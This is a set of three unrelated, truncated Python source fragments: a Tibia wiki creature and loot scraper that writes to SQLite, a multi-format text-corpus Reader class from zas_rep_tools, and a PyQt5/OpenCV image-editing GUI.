if parseImage:
url = "https://tibia.fandom.com/wiki/%s" % (title.replace(' ', '_'))
itemHTML = getURL(url, True)
if itemHTML:
image = getFeaturedImageUrl(url, itemHTML)
if image == None or image == False:
print('Failed to get image of creature', title)
# add stuff to database
c.execute('INSERT INTO Creatures (title, name, health_points, xp_points, max_damage, summon_mana, is_illusionable, is_pushable, pushes, element_physical, element_holy, element_death, element_fire, element_energy, element_ice, element_earth, element_drown, element_lifedrain, is_paralysable, senses_invis, wiki_image_url, abilities, speed, armor, is_boss, notes, strategy, behaviour, convince_mana, bestiary_name, bestiary_text, bestiary_level, occurrence, element_heal, runs_at, sounds, location, implemented) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)',
(title, name, hp, exp, maxdmg, summon, illusionable, pushable, pushes, physical, holy, death, fire, energy, ice, earth, drown, lifedrain, paralysable, senseinvis, image, abilities, speed, armor, boss, notes, strategy, behaviour, convince, bestiaryname, bestiarytext, bestiarylevel, occurrence, heal, runsat, sounds, location, implemented))
creatureid = c.lastrowid
creaturedrops[creatureid] = dict()
# for some reason loot statistics are not in the xml file, so we get it from the website
url = 'http://tibia.fandom.com/wiki/Loot_Statistics:%s' % title.replace(' ','_')
stats = getURL(url, True)
if stats != None:
loot_stats = list()
current_index = 0
while True:
match = lootListRegex.search(stats[current_index:])
if match == None: break
index = match.end()
match = lootListRegex.search(stats[current_index + index:])
if match == None: endindex = len(stats) - current_index
else: endindex = index + match.start()
kill_count = 0
match = re.search('([0-9]+) kills', stats[current_index + index:current_index + endindex])
if match != None: kill_count = int(match.groups()[0])
list.append(loot_stats, [current_index + index, current_index + endindex, kill_count])
current_index = current_index + endindex
lootdrops = dict()
killcount = dict()
score = dict()
for i in range(len(loot_stats)):
index = loot_stats[i][0]
endindex = loot_stats[i][1]
kills = loot_stats[i][2]
lootdrops[i] = dict()
killcount[i] = kills
bag = False
highpercentage = False
while True:
match = wikiURLRegex.search(stats[index:endindex])
if match == None: break
item_name = filterItemName(match.groups()[0]).lower()
# creatures don't drop bags, but they used to in the past
# if there is a bag in the creature kills, we know it's old
startindex = index
index = index + match.end()
if index > endindex or item_name == "loot": break
match = lootCountRegex.search(stats[startindex:index])
if match == None:
mindrop = 1
maxdrop = 1
else:
mindrop = int(match.groups()[0])
maxdrop = int(match.groups()[1])
match | |
<filename>zas_rep_tools/src/classes/reader.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : XXX{Information about this code}XXX
# Author:
# c(Developer) -> {'<NAME>'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Programm Info######
#
#
#
#
#
from __future__ import division
from __future__ import absolute_import
import os
import copy
import sys
import regex
import logging
import codecs
import json
import csv
import unicodecsv as unicodecsv
from lxml import etree as ET
import psutil
import zipfile
import cStringIO
import json
import StringIO
#zipfile.ZipExtFile
from collections import defaultdict
from raven import Client
#from cached_property import cached_property
from encodings.aliases import aliases
from decimal import Decimal, ROUND_HALF_UP, ROUND_UP, ROUND_HALF_DOWN, ROUND_DOWN
#from zas_rep_tools.src.utils.db_helper import *
#from zas_rep_tools.src.classes.configer import Configer
from zas_rep_tools.src.utils.helpers import set_class_mode, print_mode_name, LenGen, path_to_zas_rep_tools, get_number_of_streams_adjust_cpu, instance_info, SharedCounterExtern, SharedCounterIntern, Status, function_name,statusesTstring
#from zas_rep_tools.src.utils.logger import *
from zas_rep_tools.src.utils.zaslogger import ZASLogger
from zas_rep_tools.src.utils.debugger import p
from zas_rep_tools.src.utils.error_tracking import initialisation
from zas_rep_tools.src.utils.helpers import get_file_list
from zas_rep_tools.src.utils.traceback_helpers import print_exc_plus
from zas_rep_tools.src.classes.basecontent import BaseContent
import platform
if platform.uname()[0].lower() !="windows":
import colored_traceback
colored_traceback.add_hook()
else:
import colorama
csv.field_size_limit(sys.maxsize)
class Reader(BaseContent):
#supported_encodings_types = ["utf-8"]
supported_encodings_types = set(aliases.values())
supported_encodings_types.add("utf-8")
supported_file_types = ["txt", "json", "xml", "csv"]
supported_file_types_to_export = ["sqlite", "json", "xml", "csv"]
regex_templates = {
"blogger":r"(?P<id>[\d]*)\.(?P<gender>[\w]*)\.(?P<age>\d*)\.(?P<working_area>.*)\.(?P<star_constellation>[\w]*)",
}
reader_supported_formatter = {
"json":["TwitterStreamAPI".lower()],
"csv":["Sifter".lower()],
}
def __init__(self, inp_path, file_format, regex_template=False,
regex_for_fname=False, read_from_zip=False,
end_file_marker = -1, send_end_file_marker=False,
formatter_name=False, text_field_name = "text", id_field_name="id",
ignore_retweets=True,stop_process_if_possible=True,
**kwargs):
#p(read_from_zip, "read_from_zip")
super(type(self), self).__init__(**kwargs)
#super(BaseContent, self).__init__(**kwargs)
#p((regex_for_fname , regex_template))
#Input: Encapsulation:
self._inp_path = inp_path
self._file_format = file_format.lower()
#self._columns_source = columns_source
self._regex_for_fname = regex_for_fname
self._regex_template =regex_template
#p((self._regex_for_fname,self._regex_template))
self._formatter_name = formatter_name.lower() if formatter_name else formatter_name
self._text_field_name = text_field_name
self._id_field_name = id_field_name
self._ignore_retweets = ignore_retweets
self._read_from_zip = read_from_zip
self._end_file_marker = end_file_marker
self._send_end_file_marker = send_end_file_marker
self._stop_process_if_possible = stop_process_if_possible
#InstanceAttributes: Initialization
self._created_streams = 0
self._stream_done = 0
self.xmlroottag = False
self.xmlchildetag = False
self.retweet_counter = SharedCounterIntern()
self.files_to_read_orig = []
self.files_to_read_leftover = None
self.files_at_all_was_found = 0
self.zips_to_read = []
self.files_from_zips_to_read_orig = defaultdict(list)
self.files_from_zips_to_read_left_over = None
self.files_number_in_zips = 0
self.counter_lazy_getted = 0
self.logger.debug('Intern InstanceAttributes was initialized')
## Validation
if not self._validate_given_file_format():
sys.exit()
if self._end_file_marker == -10:
self.logger.error("Illegal value of the 'end_file_marker'. Please use another one.")
#return False
sys.exit()
if not self._validation_given_path():
sys.exit()
if not self._validation_regex_treatment():
sys.exit()
self.logger.low_debug('Input was validated')
# Extract Files from the given File Structure
#p(self._inp_path)
self._extract_all_files_according_given_file_format()
self.logger.debug('An instance of Reader() was created ')
#self.inp_obj = StringIO.StringIO()
#self.inp_obj.write('{"id":123456}')
## Log Settings of the Instance
attr_to_flag = ["files_from_zips_to_read_orig", "files_from_zips_to_read_left_over", ]
attr_to_len = ["files_to_read_orig", "files_to_read_leftover", "zips_to_read", ]
self._log_settings(attr_to_flag =attr_to_flag,attr_to_len =attr_to_len)
############################################################
####################__init__end#############################
############################################################
def __del__(self):
super(type(self), self).__del__()
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################Extern########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
###########################+++++++++############################
def _generator_helper(self, inp_obj, colnames=False, encoding="utf-8", csvdelimiter=',',f_name=False ):
#try:
#output.write('{"id":123456}')
if self._file_format == "txt":
row = self._readTXT(inp_obj, encoding=encoding, columns_extract_from_fname=True, colnames=colnames)
yield row
if self._send_end_file_marker:
yield self._end_file_marker
elif self._file_format == "json":
for row in self._readJSON(inp_obj, encoding=encoding, colnames=colnames,):
if row == -10:
yield -10
self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
return
yield row
if self._send_end_file_marker:
yield self._end_file_marker
elif self._file_format == "xml":
for row in self._readXML(inp_obj, encoding=encoding, colnames=colnames):
if row == -10:
yield -10
self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
return
yield row
if self._send_end_file_marker:
yield self._end_file_marker
elif self._file_format == "csv":
for row in self._readCSV(inp_obj, encoding=encoding, colnames=colnames, delimiter=csvdelimiter,f_name=f_name):
if row == -10:
self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
yield -10
return
yield row
if self._send_end_file_marker:
yield self._end_file_marker
else:
self.logger.error("'{}'-Format not supported.".format(self._file_format), exc_info=self._logger_traceback)
yield False
return
def getgenerator(self, colnames=False, encoding="utf-8", csvdelimiter=',', input_path_list=False, input_zip_file_list = False):
if not input_path_list and not input_zip_file_list:
self.logger.warning("Given Generator is empty.")
yield False
if input_path_list:
for path_to_file in input_path_list:
for row in self._generator_helper(path_to_file, colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter):
if row == -10:
yield {}
return
yield row
if self._read_from_zip:
if input_zip_file_list:
for path_to_zip, list_with_path_to_files in input_zip_file_list.iteritems():
archive = zipfile.ZipFile(path_to_zip, 'r')
for path_to_file in list_with_path_to_files:
f = archive.open(path_to_file)
for row in self._generator_helper(f, colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter, f_name=f.name):
if row == -10:
yield {}
return
yield row
self._stream_done += 1
self._print_once_ignore_retweets_counter()
def getlazy(self,colnames=False, encoding="utf-8", csvdelimiter=',', stream_number=1, adjust_to_cpu=True, min_files_pro_stream=1000, restart=True, cpu_percent_to_get=50):
self._stream_done = 0
self.retweet_counter.clear()
wish_stream_number = stream_number
if self.counter_lazy_getted>0 and restart:
self.files_from_zips_to_read_left_over = copy.deepcopy(self.files_from_zips_to_read_orig)
self.files_to_read_leftover = copy.deepcopy(self.files_to_read_orig)
self.counter_lazy_getted +=1
if stream_number <1:
stream_number = 10000
adjust_to_cpu = True
self.logger.debug("StreamNumber is less as 1. Automatic computing of strem number according cpu was enabled.")
#p(stream_number, "stream_number")
if self._get_number_of_left_over_files() == 0:
self.logger.error("No one file was found in the given path ('{}'). Please check the correctness of the given path or give other (correct one) path to the text data.".format(self._inp_path))
return []
if adjust_to_cpu:
stream_number= get_number_of_streams_adjust_cpu( min_files_pro_stream, self._get_number_of_left_over_files(), stream_number, cpu_percent_to_get=cpu_percent_to_get)
if stream_number is None:
#p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
self.logger.error("Number of input files is 0. Not generators could be returned.", exc_info=self._logger_traceback)
return []
#p(stream_number, "stream_number")
if stream_number > self._get_number_of_left_over_files():
self.logger.error("StreamNumber is higher as number of the files to read. This is not allowed.", exc_info=self._logger_traceback)
return False
list_with_generators = []
number_of_files_per_stream = int(Decimal(float(self._get_number_of_left_over_files()/stream_number)).quantize(Decimal('1.'), rounding=ROUND_DOWN))
#p((stream_number, number_of_files_per_stream), c="m")
#self.files_from_zips_to_read_orig
for i in range(stream_number):
if i < (stream_number-1): # for gens in between
files_to_read_non_zip, files_from_zips_to_read_orig = self._get_files_for_stream(number_of_files_per_stream)
else: # for the last generator
files_to_read_non_zip, files_from_zips_to_read_orig = self._get_files_for_stream(-1)
input_path_list= files_to_read_non_zip if files_to_read_non_zip else False
input_zip_file_list = files_from_zips_to_read_orig if files_from_zips_to_read_orig else False
gen = self._getlazy_single(input_path_list=input_path_list, input_zip_file_list=input_zip_file_list,colnames= colnames, encoding=encoding, csvdelimiter=csvdelimiter)
if stream_number == 1:
#p(wish_stream_number)
if wish_stream_number > 1:
return [gen]
else:
return gen
list_with_generators.append(gen)
self._created_streams = stream_number
self.logger.info(" '{}'-streams was created. (adjust_to_cpu='{}')".format(stream_number, adjust_to_cpu))
return list_with_generators
def _print_once_ignore_retweets_counter(self):
if int(self.retweet_counter) > 0:
if self._stream_done >= self._created_streams:
self.logger.info("'{}'-retweets in total was ignored.".format(int(self.retweet_counter)))
def _get_number_of_left_over_files(self):
#p(len(self.files_to_read_leftover), c="m")
#p(sum([len(v) for v in self.files_from_zips_to_read_left_over.values() ]), c="m")
return len(self.files_to_read_leftover) + sum([len(v) for v in self.files_from_zips_to_read_left_over.values() ])
def _get_files_for_stream(self,number_to_get):
number_files_leftover = self._get_number_of_left_over_files()
if number_to_get == -1:
number_to_get = number_files_leftover
if not (number_to_get <= number_files_leftover):
self.logger.error("Given Number '{}' is higher than number of leftover '{}' files to get.".format(number_to_get, number_files_leftover), exc_info=self._logger_traceback)
return False, False
files_to_read_non_zip = []
files_from_zips_to_read_orig = defaultdict(list)
getted_number = 0
while getted_number< number_to_get:
try:
files_to_read_non_zip.append(self.files_to_read_leftover.pop())
getted_number += 1
except IndexError:
try:
for k in self.files_from_zips_to_read_left_over.keys():
#if len(l[k]) != 0:
files_from_zips_to_read_orig[k].append( self.files_from_zips_to_read_left_over[k].pop() )
getted_number += 1
break
except IndexError:
del self.files_from_zips_to_read_left_over[k]
return files_to_read_non_zip, files_from_zips_to_read_orig
def _getlazy_single(self,colnames=False, encoding="utf-8", csvdelimiter=',', input_path_list=False, input_zip_file_list=False):
len_unzipped_files = len(input_path_list) if input_path_list else 0
len_zipped_files = sum([len(v) for v in input_zip_file_list.values() ]) if input_zip_file_list else 0
length = len_unzipped_files + len_zipped_files
gen = self.getgenerator(colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter, input_path_list=input_path_list, input_zip_file_list=input_zip_file_list)
#p(type(gen))
return LenGen(gen, length)
##################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################INTERN########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
def _get_col_and_values_from_fname(self, fname, compiled_regex_for_fname):
try:
col_and_values_dicts = {}
try:
for m in compiled_regex_for_fname.finditer(fname):
for k,v in m.groupdict().iteritems():
if v.isdigit():
col_and_values_dicts[unicode(k)]= int(v)
elif isinstance(v, (int, float)):
col_and_values_dicts[unicode(k)]= v
else:
col_and_values_dicts[unicode(k)]= unicode(v)
#p(col_and_values_dicts)
#col_and_values_dicts = [{unicode(k): unicode(v) for k,v in m.groupdict().iteritems()} for m in compiled_regex_for_fname.finditer(fname)]
except Exception, e:
print_exc_plus() if self._ext_tb else ""
self.logger.error("RegexError: RegexDictExtractor throw following Error: '{}'. ".format(e), exc_info=self._logger_traceback)
return False
#col_and_values_dicts = [m.groupdict() for m in compiled_regex_for_fname.finditer(fname)]
#p(col_and_values_dicts)
if len(col_and_values_dicts)==0:
self.logger.critical("ColumnsExctractionFromFileNameError: Some of the columns in the given Fname '{}' wasn't detected. Following RegEx-Expression was used: '{}'. ".format(fname,self._regex_for_fname))
return False
return col_and_values_dicts
except Exception as exception:
print_exc_plus() if self._ext_tb else ""
self.logger.critical("ColumnsExctractionFromFileNameError: Following Error was raised: '{}'. ".format(repr(exception)))
return False
def _validation_regex_treatment(self):
if self._regex_template and self._regex_for_fname:
self.logger.error("InputValidationError: Template for Regex and Regex_for_Fname was given parallel. Please give just one of them.", exc_info=self._logger_traceback)
return False
if self._file_format == "txt":
if not self._regex_template and not self._regex_for_fname:
self.logger.error("InputValidationError: Template_for_Regex or Regex_for_Fname wasn't given. Please give one of them.", exc_info=self._logger_traceback)
return False
if self._regex_template and ( self._regex_template.lower() not in Reader.regex_templates):
self.logger.error("InputValidationError: Given RegexTemplateName '{}' is not supporting! ".format(self._regex_template.lower()), exc_info=self._logger_traceback)
return False
if self._regex_for_fname and not isinstance(self._regex_for_fname, (str, unicode)):
self.logger.error("InputValidationError: RegexForFname should be an str or unicode object. Given: '{}'.".format(self._regex_for_fname), exc_info=self._logger_traceback)
return False
if self._regex_template and not self._regex_for_fname:
try:
self._regex_for_fname = Reader.regex_templates[self._regex_template]
### set given id_field_name
self._regex_for_fname = self._regex_for_fname.replace("id", self._id_field_name)
self._compiled_regex_for_fname = regex.compile(self._regex_for_fname, regex.UNICODE)
except Exception, e:
print_exc_plus() if self._ext_tb else ""
self.logger.error("InputValidationError: Given RegEx-Template '{}' is not exist or it wasn't possible to compile it. Check this Exception: '{}'. ".format(self._regex_template, e), exc_info=self._logger_traceback)
return False
elif not self._regex_template and self._regex_for_fname:
try:
self._compiled_regex_for_fname = regex.compile(self._regex_for_fname, regex.UNICODE)
except Exception, e:
print_exc_plus() if self._ext_tb else ""
self.logger.error("InputValidationError: Given RegEx-Template '{}' is not exist or it wasn't possible to compile it. Check this Exception: '{}'.".format(self._regex_template, e), exc_info=self._logger_traceback)
return False
return True
# def _extract_colnames_from_regex(self, regex_for_fname):
# p(repr(regex_for_fname), c="m")
# columns_name = regex.findall(regex_for_fname, fname.strip())
# p(columns_name, c="r")
# if not isinstance(columns_name, list) or len(columns_name)==0 or len(columns_name[0])<5:
# self.logger.critical("ColumnsExctractionFromFileNameError: Some of the columns in the given Fname '{}' wasn't | |
<reponame>omarkhaled850/photo_shop_for_pros<filename>main.py<gh_stars>0
# Name : <NAME>
import imutils
from PyQt5 import QtCore, QtGui, QtWidgets
import cv2
import numpy as np
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QAction, QFileDialog, QMainWindow, QDialog, QDialogButtonBox, QVBoxLayout, QInputDialog, \
QLineEdit
# dialog message
class CustomDialog(QDialog):
def __init__(self, *args, **kwargs):
super(CustomDialog, self).__init__(*args, **kwargs)
self.setWindowTitle("HELLO!")
buttons = QDialogButtonBox.Ok | QDialogButtonBox.Cancel
self.buttonBox = QDialogButtonBox(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.layout = QVBoxLayout()
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
# qweight
class Ui_MainWindow(QMainWindow):
global_img = None
display_img = None
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 500)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.formLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.formLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 421))
self.formLayoutWidget.setObjectName("formLayoutWidget")
self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)
self.formLayout.setContentsMargins(0, 0, 0, 0)
self.formLayout.setObjectName("formLayout")
self.main_toolbox = QtWidgets.QToolBox(self.formLayoutWidget)
self.main_toolbox.setEnabled(True)
self.main_toolbox.setMouseTracking(False)
self.main_toolbox.setObjectName("main_toolbox")
self.page = QtWidgets.QWidget()
self.page.setGeometry(QtCore.QRect(0, 0, 159, 338))
self.page.setObjectName("page")
self.verticalLayoutWidget = QtWidgets.QWidget(self.page)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, -1, 160, 341))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.gray_scale_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.gray_scale_btn.setObjectName("gray_scale_btn")
self.verticalLayout.addWidget(self.gray_scale_btn)
self.flip_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.flip_btn.setObjectName("flip_btn")
self.verticalLayout.addWidget(self.flip_btn)
self.rot_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.rot_btn.setObjectName("rot_btn")
self.verticalLayout.addWidget(self.rot_btn)
self.skewing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.skewing_btn.setObjectName("skewing_btn")
self.verticalLayout.addWidget(self.skewing_btn)
self.croping_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.croping_btn.setObjectName("croping_btn")
self.verticalLayout.addWidget(self.croping_btn)
self.scaling_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.scaling_btn.setObjectName("scaling_btn")
self.verticalLayout.addWidget(self.scaling_btn)
self.translation_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.translation_btn.setObjectName("translation_btn")
self.verticalLayout.addWidget(self.translation_btn)
self.main_toolbox.addItem(self.page, "")
self.page_2 = QtWidgets.QWidget()
self.page_2.setGeometry(QtCore.QRect(0, 0, 159, 338))
self.page_2.setObjectName("page_2")
self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.page_2)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-20, 0, 187, 295))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label.setObjectName("label")
self.verticalLayout_2.addWidget(self.label)
self.negative_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.negative_btn.setObjectName("negative_btn")
self.verticalLayout_2.addWidget(self.negative_btn)
self.hist_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.hist_btn.setObjectName("hist_btn")
self.verticalLayout_2.addWidget(self.hist_btn)
self.log_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.log_btn.setObjectName("log_btn")
self.verticalLayout_2.addWidget(self.log_btn)
self.gamma_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.gamma_btn.setObjectName("gamma_btn")
self.verticalLayout_2.addWidget(self.gamma_btn)
self.blending_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.blending_btn.setObjectName("blending_btn")
self.verticalLayout_2.addWidget(self.blending_btn)
self.bitslicing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.bitslicing_btn.setObjectName("bitslicing_btn")
self.verticalLayout_2.addWidget(self.bitslicing_btn)
self.slicing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.slicing_btn.setObjectName("slicing_btn")
self.verticalLayout_2.addWidget(self.slicing_btn)
self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.smoothing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.smoothing_btn.setObjectName("smoothing_btn")
self.verticalLayout_2.addWidget(self.smoothing_btn)
self.sharp_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.sharp_btn.setObjectName("sharp_btn")
self.verticalLayout_2.addWidget(self.sharp_btn)
self.main_toolbox.addItem(self.page_2, "")
self.page_3 = QtWidgets.QWidget()
self.page_3.setGeometry(QtCore.QRect(0, 0, 159, 338))
self.page_3.setObjectName("page_3")
self.verticalLayoutWidget_3 = QtWidgets.QWidget(self.page_3)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(-10, 0, 171, 80))
self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.threshold_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
self.threshold_btn.setObjectName("threshold_btn")
self.verticalLayout_3.addWidget(self.threshold_btn)
self.edge_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
self.edge_btn.setObjectName("edge_btn")
self.verticalLayout_3.addWidget(self.edge_btn)
self.main_toolbox.addItem(self.page_3, "")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.main_toolbox)
self.image_out = QtWidgets.QLabel(self.centralwidget)
self.image_out.setGeometry(QtCore.QRect(180, 0, 581, 441))
self.image_out.setText("")
##############################################################################################
self.image_out.setPixmap(QtGui.QPixmap(""))
self.image_out.setScaledContents(True)
self.image_out.setObjectName("image_out")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
self.menuFiles = QtWidgets.QMenu(self.menubar)
self.menuFiles.setObjectName("menuFiles")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionOpenFile = QtWidgets.QAction(MainWindow)
self.actionOpenFile.setObjectName("actionOpenFile")
self.menuFiles.addAction(self.actionOpenFile)
self.menubar.addAction(self.menuFiles.menuAction())
self.retranslateUi(MainWindow)
self.main_toolbox.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.rot_btn.clicked.connect(self.rotate_fun)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.gray_scale_btn.setText(_translate("MainWindow", "gray image"))
self.flip_btn.setText(_translate("MainWindow", "flip image"))
self.rot_btn.setText(_translate("MainWindow", "rotate image"))
self.skewing_btn.setText(_translate("MainWindow", "skewing"))
self.croping_btn.setText(_translate("MainWindow", "crop"))
self.scaling_btn.setText(_translate("MainWindow", "scaling"))
self.translation_btn.setText(_translate("MainWindow", "image translation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page),
_translate("MainWindow", "Image Operations"))
self.label.setText(_translate("MainWindow", " 1-Point Processing"))
self.hist_btn.setText(_translate("MainWindow", "histogram equalization"))
self.log_btn.setText(_translate("MainWindow", "Log transformation"))
self.gamma_btn.setText(_translate("MainWindow", "Power transformation"))
self.blending_btn.setText(_translate("MainWindow", "Image blending"))
self.bitslicing_btn.setText(_translate("MainWindow", "bite plane slicing"))
self.slicing_btn.setText(_translate("MainWindow", "Image slicing"))
self.negative_btn.setText(_translate("MainWindow", "negative"))
self.label_2.setText(_translate("MainWindow", " 2-Neighborhood Processing"))
self.smoothing_btn.setText(_translate("MainWindow", "smoothing"))
self.sharp_btn.setText(_translate("MainWindow", "sharping"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_2),
_translate("MainWindow", "Image Enhancement"))
self.threshold_btn.setText(_translate("MainWindow", "thresholding"))
self.edge_btn.setText(_translate("MainWindow", "edge segmantation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_3),
_translate("MainWindow", "Image Enhancement"))
self.threshold_btn.setText(_translate("MainWindow", "thresholding"))
self.edge_btn.setText(_translate("MainWindow", "edge segmantation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_3),
_translate("MainWindow", "Image Segmentation"))
self.menuFiles.setTitle(_translate("MainWindow", "Files"))
self.actionOpenFile.setText(_translate("MainWindow", "OpenFile"))
# connecting the open image function with the menbar button
self.actionOpenFile.triggered.connect(self.open_img)
# connecting buttons with functions
self.gray_scale_btn.clicked.connect(self.graScaleFun)
self.flip_btn.clicked.connect(self.flip_fun)
self.skewing_btn.clicked.connect(self.skewing_fun)
self.croping_btn.clicked.connect(self.crop_fun)
self.scaling_btn.clicked.connect(self.scaling_fun)
self.translation_btn.clicked.connect(self.trans_fun)
self.hist_btn.clicked.connect(self.histequ_fun)
self.log_btn.clicked.connect(self.log_fun)
self.gamma_btn.clicked.connect(self.gammacorrection)
self.blending_btn.clicked.connect(self.blend_fun)
self.slicing_btn.clicked.connect(self.slicing_fun)
self.negative_btn.clicked.connect(self.negative_fun)
self.smoothing_btn.clicked.connect(self.smoothing_fun)
self.sharp_btn.clicked.connect(self.sharp_fun)
self.threshold_btn.clicked.connect(self.threshold_fun)
self.edge_btn.clicked.connect(self.edge_fun)
self.bitslicing_btn.clicked.connect(self.bitslicing_fun)
#open a dialog fo the user to choose the image
def open_img(self):
imagePath, _ = QFileDialog.getOpenFileName()
self.global_img = cv2.imread(imagePath)
self.display_img = QPixmap(imagePath)
self.image_out.setPixmap(self.display_img)
self.resize(self.display_img.size())
self.adjustSize()
self.image_data()
def bitslicing_fun(self):
lst = []
for i in range(self.global_img.shape[0]):
for j in range(self.global_img.shape[1]):
lst.append(np.binary_repr(self.global_img[i][j], width=8))
eight_bit_img = (np.array([int(i[0]) for i in lst], dtype=np.uint8) * 128).reshape(self.global_img.shape[0],self.global_img.shape[1])
self.global_img = eight_bit_img
self.displayINlebal()
def OpenTextFile(self):
dialog = QtGui.QFileDialog()
dialog.setWindowTitle("Choose a file to open")
dialog.setFileMode(QtGui.QFileDialog.ExistingFile)
dialog.setNameFilter("Text (*.txt);; All files (*.*)")
dialog.setViewMode(QtGui.QFileDialog.Detail)
filename = QtCore.QStringList()
if (dialog.exec_()):
file_name = dialog.selectedFiles()
plain_text = open(file_name[0]).read()
self.Editor.setPlainText(plain_text)
self.file_path = str(file_name[0])
def graScaleFun(self):
gray_img = cv2.cvtColor(self.global_img, cv2.COLOR_BGR2GRAY)
self.global_img = gray_img
cv2.imwrite('savedImage.jpg', gray_img)
self.image_out.setPixmap(QtGui.QPixmap("savedImage.jpg"))
self.image_out.setScaledContents(True)
def negative_fun(self):
height, width = self.global_img.shape
self.global_img= 255 - self.global_img
negative_img = self.global_img
# Display the negative transformed image
self.displayINlebal()
def getTextForFlip(self):
text, okPressed = QInputDialog.getText(self, "fliping", "type:x or y or xy", QLineEdit.Normal, "")
if okPressed and text != '':
print(text)
return text
def flip_fun(self):
res = self.getTextForFlip()
if res == 'x':
flipedimage = cv2.flip(self.global_img, 0)
elif res == 'y':
flipedimage = cv2.flip(self.global_img, 1)
elif res == 'xy':
flipedimage = cv2.flip(self.global_img, -1)
self.global_img = flipedimage
self.displayINlebal()
return flipedimage
def getAngle(self):
angle, okPressed = QInputDialog.getDouble(self, "Get double", "Value:", 10.05, -360, 360, 10)
if okPressed:
print(angle)
return angle
def rotate_fun(self):
angle = self.getAngle()
rotated = imutils.rotate_bound(self.global_img, angle)
self.global_img = rotated
self.displayINlebal()
def skewing_fun(self):
a1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 1st point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
